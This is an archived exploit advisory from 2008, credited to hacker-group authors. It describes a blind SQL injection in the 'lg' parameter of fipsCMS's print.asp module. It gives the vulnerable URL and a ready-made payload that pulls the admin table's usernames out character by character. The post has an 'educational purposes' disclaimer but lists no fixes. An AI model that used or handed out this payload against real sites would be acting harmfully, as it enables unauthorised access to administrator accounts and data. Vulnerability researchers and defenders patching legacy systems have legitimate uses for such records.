fipsCMS (print.asp lg) Remote SQL Injection Vulnerability

2008-05-07 00:00:00

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Blind SQL Injection

Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]

Application :: fipsCMS [Print Module]

Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73

Dork 1 :: Use ur mind !

ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------

Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL]

Example : //IIF((select%20mid(last(username),1,1)%20
from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko')


-------------------------------------------[End of context]----------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.